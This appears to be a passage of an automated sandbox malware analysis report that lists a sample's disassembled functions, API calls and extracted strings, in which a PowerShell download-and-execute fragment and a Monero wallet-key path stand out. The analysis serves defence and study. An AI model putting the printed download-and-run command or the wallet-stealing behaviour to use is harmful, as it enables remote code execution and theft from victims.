                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 9a2cdbdb6a0156c4406ae2e1acd31e7138cecae313575d142631518217f29812
                                  • Instruction ID: b35056b44221f5116a487bd855acf4820086373c862b7c84e9691c3c2ccc1ed7
                                  • Opcode Fuzzy Hash: 9a2cdbdb6a0156c4406ae2e1acd31e7138cecae313575d142631518217f29812
                                  • Instruction Fuzzy Hash: 99418C71D10108ABDF14FBA0C8A2FFDBBB9AF14700F404599E11566192EFB56A49CF91
                                  Function 00BB4300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0130E038,00000000,00020119,?), ref: 00BB4344
                                  • RegQueryValueExA.ADVAPI32(?,0130E930,00000000,00000000,00000000,000000FF), ref: 00BB4368
                                  • RegCloseKey.ADVAPI32(?), ref: 00BB4372
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4397
                                  • lstrcat.KERNEL32(?,0130E6C0), ref: 00BB43AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: f613565ad36b07f545fb24a74018dd7c7bd51d798c2c2d3750f16211d8461eee
                                  • Instruction ID: 6c7ffe08deaaacb711e655837fec0bc9942db6240c36c11d7840f57f427308ab
                                  • Opcode Fuzzy Hash: f613565ad36b07f545fb24a74018dd7c7bd51d798c2c2d3750f16211d8461eee
                                  • Instruction Fuzzy Hash: F44165B6D001086BDB24FBA0EC56FFE777CAB88700F404998B71956181EAB556CC8BE1
                                  Function 00C1CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: 72618c3709308321d08471461110ff17b5c45e2a8a898622ce3f1bee9b18b4c2
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: 9E218172D80628ABDB219E59CCD19FF7A79EB83B90F054115F82967211C3308ED1BBE0
                                  Function 00BB7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,012FC8B0,00000000,00020119,?), ref: 00BB7FEE
                                  • RegQueryValueExA.ADVAPI32(?,0130E2D8,00000000,00000000,000000FF,000000FF), ref: 00BB800F
                                  • RegCloseKey.ADVAPI32(?), ref: 00BB8022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: a3889a1388f86b5bf9fd8054140c604668bb238ef5bc06d5e7b79d13297e97c9
                                  • Instruction ID: 0a01c9c99554452281bc6b20f7f60e301598d928803fa3bc362242742f7b4983
                                  • Opcode Fuzzy Hash: a3889a1388f86b5bf9fd8054140c604668bb238ef5bc06d5e7b79d13297e97c9
                                  • Instruction Fuzzy Hash: 47118CB1A44205EFD700DB95DD85FBBBBBCEB04B10F104159F619A7290D7B55948CBA0
                                  Function 00BB93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(0130E7E0,00000000,00000000,?,00BA9F71,00000000,0130E7E0,00000000), ref: 00BB93FC
                                  • lstrcpyn.KERNEL32(00E77580,0130E7E0,0130E7E0,?,00BA9F71,00000000,0130E7E0), ref: 00BB9420
                                  • lstrlen.KERNEL32(00000000,?,00BA9F71,00000000,0130E7E0), ref: 00BB9437
                                  • wsprintfA.USER32 ref: 00BB9457
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 96b36fe65eaf1d00a3e8adae2a1843a4fc9aad8b296dff8de0f46e73d6c1e348
                                  • Instruction ID: 75307a337f3faa716e4cc7e30eb9de35bf876a73fa2538bb704a097df759d2ec
                                  • Opcode Fuzzy Hash: 96b36fe65eaf1d00a3e8adae2a1843a4fc9aad8b296dff8de0f46e73d6c1e348
                                  • Instruction Fuzzy Hash: C901DE75504208FFCB04DFA8D945EAE7BB8EB48314F108298F94DAB355D731EA44DB90
                                  Function 00BA12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BA12B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA12BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BA12D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BA12F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00BA12FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 937257889d4805b83858086e45df6df75c7fa22982f48b3894296f287349bbff
                                  • Instruction ID: 7c16f0af8f7ab4cbe54d39a5146074c5ef2c6a22753e470d59017d76b5cb2cba
                                  • Opcode Fuzzy Hash: 937257889d4805b83858086e45df6df75c7fa22982f48b3894296f287349bbff
                                  • Instruction Fuzzy Hash: 200131B9A44309BFDB00DFE5DC49FAE77B8EB48700F004198FA59E7290D7709A448B90
                                  Function 00BBCB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 33033ca6541ea913157003c32bb7e2a59f22637abf022ac490571e03a9b9d2ea
                                  • Instruction ID: c5755937d3d5e75f87b66451a308440b10639143885992428e2612c422ec7071
                                  • Opcode Fuzzy Hash: 33033ca6541ea913157003c32bb7e2a59f22637abf022ac490571e03a9b9d2ea
                                  • Instruction Fuzzy Hash: 5A41C3B110079C5FDB31CB248D95FFBBFE8DB55704F1444E8E98A96182E2B19A44DFA0
                                  Function 00BB68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BB6903
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB69C6
                                  • ExitProcess.KERNEL32 ref: 00BB69F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 69a796ea951324618e0a938ea4b94b3884f593b30bc9958a78df304c1ae45153
                                  • Instruction ID: 684d6a0a39ad44d91e66828ff95169084846d9b87498db44eb6ebd7b89d8f459
                                  • Opcode Fuzzy Hash: 69a796ea951324618e0a938ea4b94b3884f593b30bc9958a78df304c1ae45153
                                  • Instruction Fuzzy Hash: 0C31ECB1901118ABDB14EFA0DD92FEDBBB8AF44300F4041D9F21976191DFB46A88CF65
                                  Function 00BB8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BC0E10,00000000,?), ref: 00BB89BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB89C6
                                  • wsprintfA.USER32 ref: 00BB89E0
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 30438ad181f88fa13e0775df3f75069e305924f07fe8b2ad1fc9a4caad977187
                                  • Instruction ID: 5b77c5f0da38e754016ec42cfd05ec9e4713ae1048d2a97011ddc7573406b5d9
                                  • Opcode Fuzzy Hash: 30438ad181f88fa13e0775df3f75069e305924f07fe8b2ad1fc9a4caad977187
                                  • Instruction Fuzzy Hash: 15216DB1A44308AFDB00DF95DC45FAEBBB8FB48710F104159FA19B7290C775A940CBA0
                                  Function 00BAA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BAA098
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: c68a05701f7511b4c6788353a68adcdb16745db2331efb7b9681ca9c94c3d3e3
                                  • Instruction ID: e099f03c890911c49917bbbc839d457a22bd7bef36bedddcd5661bbf7f4ce8cc
                                  • Opcode Fuzzy Hash: c68a05701f7511b4c6788353a68adcdb16745db2331efb7b9681ca9c94c3d3e3
                                  • Instruction Fuzzy Hash: 11F0177064C200FFD710EBA6ED49BA636E4E306304F5008A9E58DB72E0C7B499CCCB66
                                  Function 00BB8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BB96AE,00000000), ref: 00BB8EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB8EF2
                                  • wsprintfW.USER32 ref: 00BB8F08
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
